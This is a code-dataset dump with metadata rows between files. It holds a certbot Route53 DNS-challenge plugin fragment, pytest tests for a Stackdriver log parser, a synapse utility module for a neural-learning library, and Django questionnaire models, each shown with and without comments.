def more_info(self):
return "Solve a DNS01 challenge using AWS Route53"
def _setup_credentials(self):
pass
def _perform(self, domain, validation_domain_name, validation):
pass
def perform(self, achalls):
self._attempt_cleanup = True
try:
change_ids = [
self._change_txt_record("UPSERT",
achall.validation_domain_name(achall.domain),
achall.validation(achall.account_key))
for achall in achalls
]
for change_id in change_ids:
self._wait_for_change(change_id)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during perform: %s', e, exc_info=True)
raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
return [achall.response(achall.account_key) for achall in achalls]
def _cleanup(self, domain, validation_domain_name, validation):
try:
self._change_txt_record("DELETE", validation_domain_name, validation)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
def _find_zone_id_for_domain(self, domain):
paginator = self.r53.get_paginator("list_hosted_zones")
zones = []
target_labels = domain.rstrip(".").split(".")
for page in paginator.paginate():
for zone in page["HostedZones"]:
if zone["Config"]["PrivateZone"]:
continue
candidate_labels = zone["Name"].rstrip(".").split(".")
if candidate_labels == target_labels[-len(candidate_labels):]:
zones.append((zone["Name"], zone["Id"]))
if not zones:
raise errors.PluginError(
"Unable to find a Route53 hosted zone for {0}".format(domain)
)
zones.sort(key=lambda z: len(z[0]), reverse=True)
return zones[0][1]
def _change_txt_record(self, action, validation_domain_name, validation):
zone_id = self._find_zone_id_for_domain(validation_domain_name)
rrecords = self._resource_records[validation_domain_name]
challenge = {"Value": '"{0}"'.format(validation)}
if action == "DELETE":
rrecords.remove(challenge)
if rrecords:
action = "UPSERT"
else:
# Create a new list containing the record to use with DELETE
rrecords = [challenge]
else:
rrecords.append(challenge)
response = self.r53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
"Comment": "certbot-dns-route53 certificate validation " + action,
"Changes": [
{
"Action": action,
"ResourceRecordSet": {
"Name": validation_domain_name,
"Type": "TXT",
"TTL": self.ttl,
"ResourceRecords": rrecords,
}
}
]
}
)
return response["ChangeInfo"]["Id"]
def _wait_for_change(self, change_id):
for unused_n in range(0, 120):
response = self.r53.get_change(Id=change_id)
if response["ChangeInfo"]["Status"] == "INSYNC":
return
time.sleep(5)
raise errors.PluginError(
"Timed out waiting for Route53 change. Current status: %s" %
response["ChangeInfo"]["Status"])
| true
| true
|
f7193608cbcf5a355487e2c77d44dfda695bddce
| 5,728
|
py
|
Python
|
tests/test_stackdriver_parser.py
|
cleardataeng/forseti-policy-enforcer
|
11eca7e7012759be2730297ef362708695885da7
|
[
"Apache-2.0"
] | 11
|
2019-04-12T21:23:49.000Z
|
2020-09-02T11:16:49.000Z
|
tests/test_stackdriver_parser.py
|
forseti-security/real-time-enforcer
|
11eca7e7012759be2730297ef362708695885da7
|
[
"Apache-2.0"
] | 18
|
2019-04-09T16:23:03.000Z
|
2021-04-26T14:25:17.000Z
|
tests/test_stackdriver_parser.py
|
forseti-security/forseti-policy-enforcer
|
11eca7e7012759be2730297ef362708695885da7
|
[
"Apache-2.0"
] | 11
|
2019-05-08T09:08:08.000Z
|
2021-04-26T19:23:24.000Z
|
# Copyright 2019 The Forseti Real Time Enforcer Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import pytest
from app.parsers.stackdriver import StackdriverParser
from google.oauth2.credentials import Credentials
from rpe.resources.gcp import GoogleAPIResource
test_google_args = {
'credentials': Credentials(token='bogus'),
}
def get_test_data(filename):
'''Load json data from the tests dir'''
p = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'data',
filename,
)
with open(p) as f:
return json.load(f)
# parameters for testing logs that should return a single asset
test_single_asset_log_params = [
# filename, expected_resource_type, expected_operation_type, expected_resource_name
("app-engine-debug.json", "appengine.googleapis.com/Instance", "write", "aef-default-test-instance"),
("bq-ds-set-iam-policy.json", "bigquery.googleapis.com/Dataset", "write", "wooo"),
("bigtable-set-iam-policy.json", "bigtableadmin.googleapis.com/Instance", "write", "example-instance"),
("pubsub-subscription-set-iam-policy.json", "pubsub.googleapis.com/Subscription", "write", "test-subscription"),
("pubsub-topic-set-iam-policy.json", "pubsub.googleapis.com/Topic", "write", "test-topic"),
# CloudSQL logs are inconsistent. See https://issuetracker.google.com/issues/137629452
("cloudsql-resource.labels.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.body.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.resource.instanceName.instanceId.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudfunctions-set-iam-policy.json", "cloudfunctions.googleapis.com/CloudFunction", "write", "example_function"),
("compute-subnetworks-enable-flow-logs.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-subnetworks-set-private-ip-google-access.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-firewalls-enable-logs-policy.json", "compute.googleapis.com/Firewall", "write", "test-firewall"),
("dataproc_createcluster.json", "dataproc.googleapis.com/Cluster", "write", "test-dataproc-cluster"),
("datafusion-create-instance.json", "datafusion.googleapis.com/Instance", "create", "test-instance"),
("datafusion-update-instance.json", "datafusion.googleapis.com/Instance", "write", "test-instance"),
("gke-cluster-update.json", "container.googleapis.com/Cluster", "write", "example-cluster"),
("gke-nodepool-set.json", "container.googleapis.com/NodePool", "write", "example-pool"),
("servicemanagement-enable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubeadsreach.googleapis.com"),
("servicemanagement-disable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("servicemanagement-activate-service.json", "serviceusage.googleapis.com/Service", "write", "calendar-json.googleapis.com"),
("servicemanagement-deactivate-service.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("serviceusage-enable.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("serviceusage-disable.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("dataflow-job-step.json", "dataflow.googleapis.com/Job", "write", "job-id"),
("memorystore-redis.json", "redis.googleapis.com/Instance", "write", "test-instance"),
]
test_log_resource_count_params = [
("serviceusage-batchenable.json", 3),
("compute-hardened-images.json", 3),
]
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_single_asset_log_messages(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == 1
asset_info = assets[0]
assert asset_info['resource_type'] == expected_resource_type
#assert asset_info['operation_type'] == expected_operation_type
assert asset_info['name'] == expected_resource_name
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_rpe_from_stackdriver_data(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
asset_info = assets[0]
GoogleAPIResource.from_resource_data(client_kwargs=test_google_args, **asset_info)
@pytest.mark.parametrize(
"filename,expected_resource_count",
test_log_resource_count_params
)
def test_log_resource_count(filename, expected_resource_count):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == expected_resource_count
asset_info = assets[0]
| 49.37931
| 138
| 0.752793
|
import json
import os
import pytest
from app.parsers.stackdriver import StackdriverParser
from google.oauth2.credentials import Credentials
from rpe.resources.gcp import GoogleAPIResource
test_google_args = {
'credentials': Credentials(token='bogus'),
}
def get_test_data(filename):
p = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'data',
filename,
)
with open(p) as f:
return json.load(f)
test_single_asset_log_params = [
("app-engine-debug.json", "appengine.googleapis.com/Instance", "write", "aef-default-test-instance"),
("bq-ds-set-iam-policy.json", "bigquery.googleapis.com/Dataset", "write", "wooo"),
("bigtable-set-iam-policy.json", "bigtableadmin.googleapis.com/Instance", "write", "example-instance"),
("pubsub-subscription-set-iam-policy.json", "pubsub.googleapis.com/Subscription", "write", "test-subscription"),
("pubsub-topic-set-iam-policy.json", "pubsub.googleapis.com/Topic", "write", "test-topic"),
("cloudsql-resource.labels.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.body.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.resource.instanceName.instanceId.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudfunctions-set-iam-policy.json", "cloudfunctions.googleapis.com/CloudFunction", "write", "example_function"),
("compute-subnetworks-enable-flow-logs.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-subnetworks-set-private-ip-google-access.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-firewalls-enable-logs-policy.json", "compute.googleapis.com/Firewall", "write", "test-firewall"),
("dataproc_createcluster.json", "dataproc.googleapis.com/Cluster", "write", "test-dataproc-cluster"),
("datafusion-create-instance.json", "datafusion.googleapis.com/Instance", "create", "test-instance"),
("datafusion-update-instance.json", "datafusion.googleapis.com/Instance", "write", "test-instance"),
("gke-cluster-update.json", "container.googleapis.com/Cluster", "write", "example-cluster"),
("gke-nodepool-set.json", "container.googleapis.com/NodePool", "write", "example-pool"),
("servicemanagement-enable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubeadsreach.googleapis.com"),
("servicemanagement-disable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("servicemanagement-activate-service.json", "serviceusage.googleapis.com/Service", "write", "calendar-json.googleapis.com"),
("servicemanagement-deactivate-service.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("serviceusage-enable.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("serviceusage-disable.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("dataflow-job-step.json", "dataflow.googleapis.com/Job", "write", "job-id"),
("memorystore-redis.json", "redis.googleapis.com/Instance", "write", "test-instance"),
]
test_log_resource_count_params = [
("serviceusage-batchenable.json", 3),
("compute-hardened-images.json", 3),
]
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_single_asset_log_messages(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == 1
asset_info = assets[0]
assert asset_info['resource_type'] == expected_resource_type
assert asset_info['name'] == expected_resource_name
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_rpe_from_stackdriver_data(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
asset_info = assets[0]
GoogleAPIResource.from_resource_data(client_kwargs=test_google_args, **asset_info)
@pytest.mark.parametrize(
    "filename,expected_resource_count",
    test_log_resource_count_params
)
def test_log_resource_count(filename, expected_resource_count):
    """Multi-asset log fixtures yield one extracted asset per referenced resource."""
    log_message = get_test_data(filename)
    assets = StackdriverParser._extract_asset_info(log_message)
    assert len(assets) == expected_resource_count
    # Removed a dead trailing `asset_info = assets[0]` assignment — the value
    # was never used.
| true
| true
|
f7193619bac808f3d98da51fdcf5aec8a4d3189e
| 7,952
|
py
|
Python
|
blur/synapse_util.py
|
DionysisChristopoulos/google-research
|
7f59ef421beef32ca16c2a7215be74f7eba01a0f
|
[
"Apache-2.0"
] | 7
|
2021-06-15T05:54:29.000Z
|
2022-02-21T06:57:06.000Z
|
blur/synapse_util.py
|
DionysisChristopoulos/google-research
|
7f59ef421beef32ca16c2a7215be74f7eba01a0f
|
[
"Apache-2.0"
] | null | null | null |
blur/synapse_util.py
|
DionysisChristopoulos/google-research
|
7f59ef421beef32ca16c2a7215be74f7eba01a0f
|
[
"Apache-2.0"
] | 5
|
2021-11-25T07:40:17.000Z
|
2022-03-22T11:13:39.000Z
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for synapse handling."""
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
# Shorthand aliases for the array backends this module supports.
TensorShape = tf.TensorShape
# NOTE(review): `jp.array` is jax.numpy's array *function*, not a type;
# `jnp.ndarray` was likely intended — confirm before tightening annotations.
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
  """Shape/channel information handed to a SynapseInitializer callable."""
  shape: TensorShape  # full synapse tensor shape, incl. population dims
  in_neurons: int  # number of input-layer channels
  out_neurons: int  # number of output-layer channels
class UpdateType(enum.Enum):
  """Which direction(s) of synaptic update a step applies."""
  FORWARD = 1
  BACKWARD = 2
  BOTH = 3
  NONE = 4
# A callable that produces a synapse tensor from SynapseInitializerParams.
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]

# A callable that takes a sequence of layers and SynapseInitializer and creates
# appropriately shaped list of Synapses.
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
  """Returns a tensor of `shape` drawn uniformly from [-1, 1)."""
  return (tf.random.uniform(shape, seed=seed) - 0.5) * 2


def random_initializer(start_seed=0, scale_by_channels=False,
                       scale=1, bias=0, random_fn=random_uniform_symmetric):
  """Returns an initializer that generates a random sequence.

  Args:
    start_seed: base seed; each call of the returned initializer advances it.
    scale_by_channels: if True, divide by sqrt(num_channels) (the -2 axis).
    bias: mean offset added to the scaled random values.
    scale: multiplicative scale, or a callable mapping params -> scale.
    random_fn: generator called as random_fn(shape, seed).

  Returns:
    Callable mapping SynapseInitializerParams-like objects to tensors.
  """
  seed = [hash(str(start_seed))]  # mutable cell so the closure can advance it

  def impl(params):
    # shape: species x (in+out) x (in+out) x states; -2 is the channel axis.
    # Fix: default num_channels to 1 so scale_by_channels no longer raises
    # NameError when the shape has rank < 3 (previously num_channels was
    # only bound inside the rank check).
    num_channels = int(params.shape[-2]) if len(params.shape) >= 3 else 1
    seed[0] += 1
    v = random_fn(params.shape, seed[0])
    apply_scale = scale(params) if callable(scale) else scale
    r = v * apply_scale + bias
    if scale_by_channels:
      r = r / (num_channels ** 0.5)
    return r
  return impl
def _random_uniform_fn(start_seed):
  """Returns a uniform[-1, 1] generator backed by a private np.random state."""
  state = np.random.RandomState(start_seed)

  def sample(shape):
    values = state.uniform(low=-1, high=1, size=shape)
    return tf.constant(values, dtype=np.float32)

  return sample
def fixed_random_initializer(start_seed=0,
                             scale_by_channels=False,
                             scale=1,
                             bias=0,
                             random_fn=None):
  """Returns an initializer that generates random (but fixed) sequence.

  The resulting tensors are backed by a constant so they produce the same
  value across all calls.

  This initializer uses its own random state that is independent of default
  random sequence.

  Args:
    start_seed: initial seed passed to np.random.RandomState
    scale_by_channels: whether to scale by number of channels.
    scale: target scale (default: 1), or a callable mapping params -> scale.
    bias: mean of the resulting distribution.
    random_fn: random generator; if None, uses _random_uniform_fn.

  Returns:
    callable that accepts shape and returns tensorflow constant tensor.
  """
  if random_fn is None:
    random_fn = _random_uniform_fn(start_seed)

  def impl(params):
    # shape: species x (in+out) x (in+out) x states; -2 is the channel axis.
    # Fix: default num_channels to 1 so scale_by_channels no longer raises
    # NameError on shapes of rank < 3 (previously num_channels was only
    # bound inside the rank check).
    num_channels = int(params.shape[-2]) if len(params.shape) >= 3 else 1
    v = random_fn(shape=params.shape)
    apply_scale = scale(params) if callable(scale) else scale
    r = v * apply_scale + bias
    if scale_by_channels:
      r = r / (num_channels ** 0.5)
    return r
  return impl
def create_synapse_init_fns(
    layers,
    initializer):
  """Generates network synapse initializers.

  Arguments:
    layers: Sequence of network layers (used for shape calculation).
    initializer: SynapseInitializer used to initialize synapse tensors.

  Returns:
    A list of zero-argument functions, one per adjacent layer pair, each
    producing that pair's synapse tensor when called.
  """
  init_fns = []
  for pre, post in zip(layers, layers[1:]):
    # Layer layout: population_dims, batch_size, in_channels, neuron_state.
    pop_dims = pre.shape[:-3]
    in_channels = pre.shape[-2]
    out_channels = post.shape[-2]
    # +1 accounts for the bias row/column in the synapse matrix.
    num_inputs = in_channels + out_channels + 1
    num_states = pre.shape[-1]
    params = SynapseInitializerParams(
        shape=(*pop_dims, num_inputs, num_inputs, num_states),
        in_neurons=in_channels,
        out_neurons=out_channels)
    init_fns.append(ft.partial(initializer, params))
  return init_fns
def create_synapses(layers,
                    initializer):
  """Generates arbitrary form synapses.

  Arguments:
    layers: Sequence of network layers (used for shape calculation).
    initializer: SynapseInitializer used to initialize synapse tensors.

  Returns:
    A list of created synapse tensors for all layers.
  """
  init_fns = create_synapse_init_fns(layers, initializer)
  return [make_synapse() for make_synapse in init_fns]
def transpose_synapse(synapse, env):
  """Swaps the two neuron axes of `synapse`; batch and state axes stay put."""
  batch_rank = len(synapse.shape[:-3])
  # Keep leading batch dims, exchange axes -3 and -2, keep the state axis.
  permutation = list(range(batch_rank))
  permutation += [batch_rank + 1, batch_rank, batch_rank + 2]
  return env.transpose(synapse, permutation)
def synapse_submatrix(synapse,
                      in_channels,
                      update_type,
                      include_bias = True):
  """Returns a submatrix of a synapse matrix given the update type."""
  offset = in_channels + (1 if include_bias else 0)
  if update_type == UpdateType.FORWARD:
    # Rows = input side (plus optional bias row), columns = output side.
    return synapse[Ellipsis, :offset, offset:, :]
  if update_type == UpdateType.BACKWARD:
    # NOTE(review): the lower row bound is in_channels + 1 regardless of
    # include_bias (asymmetric with FORWARD) — preserved as in the original.
    return synapse[Ellipsis, (in_channels + 1):, :offset, :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
                            env):
  """Combines forward and backward synapses into one block matrix.

  Layout over the two channel axes:
      [ 0                in_out_synapse ]
      [ out_in_synapse   0              ]
  """
  batch_dims = in_out_synapse.shape[:-3]
  out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
  top = env.concat(
      [env.zeros((*batch_dims, out_channels, out_channels, num_states)),
       in_out_synapse],
      axis=-2)
  bottom = env.concat(
      [out_in_synapse,
       env.zeros((*batch_dims, in_channels, in_channels, num_states))],
      axis=-2)
  return env.concat([top, bottom], axis=-3)
def sync_all_synapses(synapses, layers, env):
  """Sync synapses across all layers.

  For each synapse, syncs its first-state forward synapse with the backward
  synapse. The list is updated in place and also returned.

  Args:
    synapses: list of synapses in the network.
    layers: list of layers in the network (one per synapse is read).
    env: Environment

  Returns:
    The same `synapses` list with synchronized entries.
  """
  for idx, (synapse, layer) in enumerate(zip(synapses, layers)):
    synapses[idx] = sync_in_and_out_synapse(synapse, layer.shape[-2], env)
  return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
  """Copies the forward synapse over the backward one (as its transpose)."""
  forward = synapse_submatrix(
      synapse,
      in_channels=in_channels,
      update_type=UpdateType.FORWARD,
      include_bias=True)
  backward = transpose_synapse(forward, env)
  return combine_in_out_synapses(forward, backward, env)
def sync_states_synapse(synapse, env, num_states=None):
  """Broadcasts state 0 of `synapse` across all (or `num_states`) states."""
  if num_states is None:
    num_states = synapse.shape[-1]
  first_state = synapse[Ellipsis, 0]
  return env.stack([first_state] * num_states, axis=-1)
def normalize_synapses(synapses,
                       rescale_to,
                       env,
                       axis = -3):
  """Normalizes synapses across a particular axis (across input by default).

  axis=-3 corresponds to the input-neuron dimension of (..., in, out, states).
  The input tensor is updated in place (augmented assignment) and returned.
  """
  # 1e-9 guards against division by zero for all-zero columns.
  norm = env.sqrt(env.sum(synapses ** 2, axis=axis, keepdims=True) + 1e-9)
  synapses /= norm
  if rescale_to is not None:
    synapses *= rescale_to
  return synapses
| 31.43083
| 80
| 0.689764
|
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
shape: TensorShape
in_neurons: int
out_neurons: int
class UpdateType(enum.Enum):
FORWARD = 1
BACKWARD = 2
BOTH = 3
NONE = 4
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
return (tf.random.uniform(shape, seed=seed) - 0.5) * 2
def random_initializer(start_seed=0, scale_by_channels=False,
scale=1, bias=0, random_fn=random_uniform_symmetric):
seed = [hash(str(start_seed))]
def impl(params):
if len(params.shape) >= 3:
num_channels = int(params.shape[-2])
seed[0] += 1
v = random_fn(params.shape, seed[0])
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def _random_uniform_fn(start_seed):
rng = np.random.RandomState(start_seed)
return lambda shape: tf.constant(rng.uniform(
low=-1, high=1, size=shape), dtype=np.float32)
def fixed_random_initializer(start_seed=0,
scale_by_channels=False,
scale=1,
bias=0,
random_fn=None):
if random_fn is None:
random_fn = _random_uniform_fn(start_seed)
def impl(params):
if len(params.shape) >= 3:
num_channels = int(params.shape[-2])
v = random_fn(shape=params.shape)
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def create_synapse_init_fns(
layers,
initializer):
synapse_init_fns = []
for pre, post in zip(layers, layers[1:]):
pop_dims = pre.shape[:-3]
num_inputs = pre.shape[-2] + post.shape[-2] + 1
synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
params = SynapseInitializerParams(
shape=synapse_shape,
in_neurons=pre.shape[-2],
out_neurons=post.shape[-2])
synapse_init_fns.append(ft.partial(initializer, params))
return synapse_init_fns
def create_synapses(layers,
initializer):
return [init_fn() for init_fn in create_synapse_init_fns(layers, initializer)]
def transpose_synapse(synapse, env):
num_batch_dims = len(synapse.shape[:-3])
perm = [
*range(num_batch_dims), num_batch_dims + 1, num_batch_dims,
num_batch_dims + 2
]
return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
in_channels,
update_type,
include_bias = True):
bias = 1 if include_bias else 0
if update_type == UpdateType.FORWARD:
return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
if update_type == UpdateType.BACKWARD:
return synapse[Ellipsis, (in_channels + 1):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
env):
batch_dims = in_out_synapse.shape[:-3]
out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
synapse = env.concat([
env.concat([
env.zeros((*batch_dims, out_channels, out_channels, num_states)),
in_out_synapse
], axis=-2),
env.concat([
out_in_synapse,
env.zeros((*batch_dims, in_channels, in_channels, num_states))
], axis=-2)
], axis=-3)
return synapse
def sync_all_synapses(synapses, layers, env):
for i in range(len(synapses)):
synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
in_out_synapse = synapse_submatrix(
synapse,
in_channels=in_channels,
update_type=UpdateType.FORWARD,
include_bias=True)
return combine_in_out_synapses(
in_out_synapse,
transpose_synapse(in_out_synapse, env),
env)
def sync_states_synapse(synapse, env, num_states=None):
if num_states is None:
num_states = synapse.shape[-1]
return env.stack(num_states*[synapse[Ellipsis, 0]], axis=-1)
def normalize_synapses(synapses,
rescale_to,
env,
axis = -3):
squared = env.sum(synapses ** 2, axis=axis, keepdims=True)
synapses /= env.sqrt(squared + 1e-9)
if rescale_to is not None:
synapses *= rescale_to
return synapses
| true
| true
|
f71936663f2310c9c86574acc5b1c59f865d0108
| 3,113
|
py
|
Python
|
questionnaire/models.py
|
cjz25/cquestionnaire
|
961c508d463a8d9d50c8485fa65c4a9d3a56e5fa
|
[
"MIT"
] | null | null | null |
questionnaire/models.py
|
cjz25/cquestionnaire
|
961c508d463a8d9d50c8485fa65c4a9d3a56e5fa
|
[
"MIT"
] | null | null | null |
questionnaire/models.py
|
cjz25/cquestionnaire
|
961c508d463a8d9d50c8485fa65c4a9d3a56e5fa
|
[
"MIT"
] | 1
|
2021-10-15T12:51:01.000Z
|
2021-10-15T12:51:01.000Z
|
from django.db import models
# from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _
# Create your models here.
class Questionnaire(models.Model):
    """A questionnaire: a titled, described collection of questions."""
    title = models.CharField(max_length=50)
    description = models.TextField(blank=True, default='')
    # created_by = models.ForeignKey(User, on_delete=models.CASCADE)
    updated_dtm = models.DateTimeField(auto_now=True)  # refreshed on every save

    def __str__(self):
        return self.title
class Question(models.Model):
    """A single question belonging to a Questionnaire."""

    # short answer, multiple choice, checkboxes
    # https://docs.djangoproject.com/en/3.1/ref/models/fields/#enumeration-types
    class QuestionType(models.TextChoices):
        SHORT_ANSWER = 'SA', _('Short Answer')
        MULTIPLE_CHOICE = 'MC', _('Multiple Choice')
        CHECKBOXES = 'CB', _('Checkboxes')

    questionnaire = models.ForeignKey(
        Questionnaire,
        on_delete=models.CASCADE,
        related_name='questions'
    )
    title = models.CharField(max_length=50)
    description = models.TextField(blank=True, default='')
    # whether the respondent must answer this question
    required = models.BooleanField()
    question_type = models.CharField(
        max_length=2,
        choices=QuestionType.choices,
        default=QuestionType.SHORT_ANSWER,
    )
    # whether the question is currently shown
    visible = models.BooleanField()

    def __str__(self):
        return f'{self.questionnaire.title} | {self.title}'
class QuestionSequence(models.Model):
    """Position (`seq`) of a Question within a Questionnaire."""
    questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    seq = models.PositiveSmallIntegerField(default=0)

    class Meta:
        # One ordering entry per (questionnaire, question) pair.
        unique_together = (('questionnaire', 'question'),)
class QuestionChoice(models.Model):
    """One selectable option (`item`) offered by a Question."""
    question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
    item = models.CharField(max_length=100)

    def __str__(self):
        return f'{self.question.title} | {self.item}'
class QuestionChoiceSequence(models.Model):
    """Position (`seq`) of a QuestionChoice within its Question."""
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    questionchoice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
    seq = models.PositiveSmallIntegerField(default=0)

    class Meta:
        # One ordering entry per (question, choice) pair.
        unique_together = (('question', 'questionchoice'),)
# response master
class QuestionResponseMaster(models.Model):
    """One submission of a questionnaire; detail rows hang off this record."""
    questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
# response detail
class QuestionResponseDetail(models.Model):
    """Per-question row of a submission; answers link to this record."""
    response_master_id = models.ForeignKey(QuestionResponseMaster, on_delete=models.CASCADE)
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
# response for question types: multiple choice, checkboxes
class QuestionResponseSelection(models.Model):
    """A chosen option for a multiple-choice/checkbox question response."""
    response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
    choice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
# response for question type: short answer
class QuestionResponseText(models.Model):
    """Free-text answer for a short-answer question response."""
    response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
    text = models.TextField()
| 33.836957
| 92
| 0.73948
|
from django.db import models
from django.utils.translation import gettext_lazy as _
class Questionnaire(models.Model):
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
updated_dtm = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Question(models.Model):
class QuestionType(models.TextChoices):
SHORT_ANSWER = 'SA', _('Short Answer')
MULTIPLE_CHOICE = 'MC', _('Multiple Choice')
CHECKBOXES = 'CB', _('Checkboxes')
questionnaire = models.ForeignKey(
Questionnaire,
on_delete=models.CASCADE,
related_name='questions'
)
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
required = models.BooleanField()
question_type = models.CharField(
max_length=2,
choices=QuestionType.choices,
default=QuestionType.SHORT_ANSWER,
)
visible = models.BooleanField()
def __str__(self):
return f'{self.questionnaire.title} | {self.title}'
class QuestionSequence(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('questionnaire', 'question'),)
class QuestionChoice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
item = models.CharField(max_length=100)
def __str__(self):
return f'{self.question.title} | {self.item}'
class QuestionChoiceSequence(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
questionchoice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('question', 'questionchoice'),)
class QuestionResponseMaster(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
class QuestionResponseDetail(models.Model):
response_master_id = models.ForeignKey(QuestionResponseMaster, on_delete=models.CASCADE)
